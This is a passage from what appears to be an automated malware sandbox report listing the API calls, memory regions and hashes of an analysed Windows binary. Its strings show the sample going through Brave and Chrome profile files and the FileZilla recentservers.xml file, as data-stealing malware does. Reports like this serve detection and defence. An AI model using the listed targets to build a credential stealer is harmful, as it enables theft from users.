                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: e8675cef09d39f936652d9ae802345c2f4636dfd41a66dbdd73aefaf9aa12310
                                  • Instruction ID: ffa65a3e8d126131ac5751efb6d30b16698da3bdd8cd494e35870cea405b718e
                                  • Opcode Fuzzy Hash: e8675cef09d39f936652d9ae802345c2f4636dfd41a66dbdd73aefaf9aa12310
                                  • Instruction Fuzzy Hash: 1792A53190126A9FCB22EF66DC89AEF77BDAF44700F095225F805A7291DB74DD41CBA0
                                  Function 003EDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDBEF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003EDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC17
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003EDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDC4C
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDC8F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003EDCD0
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003EDCF0
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003EDD0A
                                  • lstrlen.KERNEL32(0040CFEC), ref: 003EDD1D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDD7B
                                  • lstrlen.KERNEL32(00411794), ref: 003EDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDA3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDDAF
                                  • lstrlen.KERNEL32(?), ref: 003EDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDE19
                                  • lstrlen.KERNEL32(00411794), ref: 003EDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDE6F
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDE7B
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDEBB
                                  • lstrlen.KERNEL32(00411794), ref: 003EDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EDEE6
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDEF2
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFA5
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EDFB1
                                  • lstrlen.KERNEL32(011A8C18), ref: 003EDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EDFF4
                                  • lstrlen.KERNEL32(00411794), ref: 003EDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE022
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003EE02E
                                  • lstrlen.KERNEL32(011A89E8), ref: 003EE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 003EE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 003EE0E7
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE11F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003EE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 003EE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE19F
                                  • lstrcat.KERNEL32(00000000), ref: 003EE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003EE1F9
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE22F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003EE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE261
                                  • lstrcat.KERNEL32(00000000,011A8A18), ref: 003EE269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 003EE274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 003EE2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE349
                                  • DeleteFileA.KERNEL32(?), ref: 003EE381
                                  • StrCmpCA.SHLWAPI(?,011AEEE8), ref: 003EE3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE445
                                  • StrCmpCA.SHLWAPI(?,011A89E8), ref: 003EE468
                                  • StrCmpCA.SHLWAPI(?,011A8C18), ref: 003EE47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003EE4E0
                                  • StrCmpCA.SHLWAPI(?,011AEDB0), ref: 003EE58E
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EE5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003EE639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 003EE776
                                  • DeleteFileA.KERNEL32(?), ref: 003EE7D2
                                  • StrCmpCA.SHLWAPI(?,011A89F8), ref: 003EE7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EE916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003EE952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: 38727f7ae3a0b3fd8bb95b10659cc5036f7766c9ebe879bdee0baf9c91078776
                                  • Instruction ID: de326a1a232c7120ad745ca35dc0da0bb53e1972270e55cf3cda18e68c4e3ff5
                                  • Opcode Fuzzy Hash: 38727f7ae3a0b3fd8bb95b10659cc5036f7766c9ebe879bdee0baf9c91078776
                                  • Instruction Fuzzy Hash: DB92C3719002669FCB22EF76DC89AEF77B9AF44300F055629F805A72D1DB34ED458B90
                                  Function 003F18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F18D2
                                  • lstrlen.KERNEL32(\*.*), ref: 003F18DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F18FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003F190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F1947
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F1967
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F1981
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F19BF
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F19F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1A4C
                                  • lstrlen.KERNEL32(00411794), ref: 003F1A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1A80
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1AB4
                                  • lstrlen.KERNEL32(?), ref: 003F1AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F1AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1B19
                                  • lstrlen.KERNEL32(011A8978), ref: 003F1B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1B8F
                                  • lstrlen.KERNEL32(00411794), ref: 003F1BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1BC3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1C57
                                  • lstrlen.KERNEL32(00411794), ref: 003F1C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1C8B
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1D21
                                  • lstrlen.KERNEL32(00411794), ref: 003F1D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1D55
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F1DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1DED
                                  • lstrlen.KERNEL32(00411794), ref: 003F1E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1E36
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1E68
                                  • lstrlen.KERNEL32(011AED20), ref: 003F1E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1EB2
                                  • lstrlen.KERNEL32(00411794), ref: 003F1EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1EE3
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1F15
                                  • lstrlen.KERNEL32(011AF3B8), ref: 003F1F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1F5F
                                  • lstrlen.KERNEL32(00411794), ref: 003F1F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1F90
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1FC2
                                  • lstrlen.KERNEL32(0119AAA8), ref: 003F1FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2036
                                  • lstrlen.KERNEL32(00411794), ref: 003F2048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2067
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F2073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2098
                                  • lstrlen.KERNEL32(?), ref: 003F20AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F20D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F20DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2103
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F213F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003F214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F2176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F2181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: b1ea7d4c3738082dff1cf96b9f95b2dedddde900b224fc9d3f988efc754d66a8
                                  • Instruction ID: cdf30f4b0b0409179c7f1aaef77382186b43a367b7ab05ce2ea31596929b33fb
                                  • Opcode Fuzzy Hash: b1ea7d4c3738082dff1cf96b9f95b2dedddde900b224fc9d3f988efc754d66a8
                                  • Instruction Fuzzy Hash: A262A03191162AEBCB23EF65DC49ABF77BAAF40700F094225F905A7291DB74DD41CBA0
                                  Function 003F3910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 003F392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003F3943
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F396C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F3986
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F39BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F39E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F39F2
                                  • lstrlen.KERNEL32(00411794), ref: 003F39FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3A1A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3A26
                                  • lstrlen.KERNEL32(?), ref: 003F3A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F3A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3A8A
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F3ACE
                                  • lstrlen.KERNEL32(?), ref: 003F3AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B36
                                  • lstrlen.KERNEL32(00411794), ref: 003F3B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B6A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3B9E
                                  • lstrlen.KERNEL32(?), ref: 003F3BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F3BE0
                                  • lstrlen.KERNEL32(011A8A18), ref: 003F3C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3C3C
                                  • lstrlen.KERNEL32(011A8978), ref: 003F3C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3CB7
                                  • lstrlen.KERNEL32(00411794), ref: 003F3CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3CE8
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F3D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3D79
                                  • lstrlen.KERNEL32(00411794), ref: 003F3D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3DAD
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3E43
                                  • lstrlen.KERNEL32(00411794), ref: 003F3E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3E77
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F3EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3F0D
                                  • lstrlen.KERNEL32(00411794), ref: 003F3F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3F41
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F3F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3F75
                                  • lstrlen.KERNEL32(?), ref: 003F3F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F3FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F3FE0
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F401F
                                  • lstrlen.KERNEL32(011AEEB8), ref: 003F402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F40CE
                                  • lstrcat.KERNEL32(00000000), ref: 003F40DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003F42D9
                                  • FindClose.KERNEL32(00000000), ref: 003F42E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: 3b895da33a702692135a9b2a70cbfc93d917eddc8de7d966c38ede332b31d7e3
                                  • Instruction ID: 62acf5aa64d910abd77a6ad3bc61fe551cb415f6d2d516d09a6ebff533e8ff9a
                                  • Opcode Fuzzy Hash: 3b895da33a702692135a9b2a70cbfc93d917eddc8de7d966c38ede332b31d7e3
                                  • Instruction Fuzzy Hash: E962933191161AABCB23EF75CC49AEF77B9AF44700F058225F905A7291DB74EE41CBA0
                                  Function 003F6960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003F69C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F6A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003F6A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003F6AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F6B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003F6B35
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6B9D
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F6BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
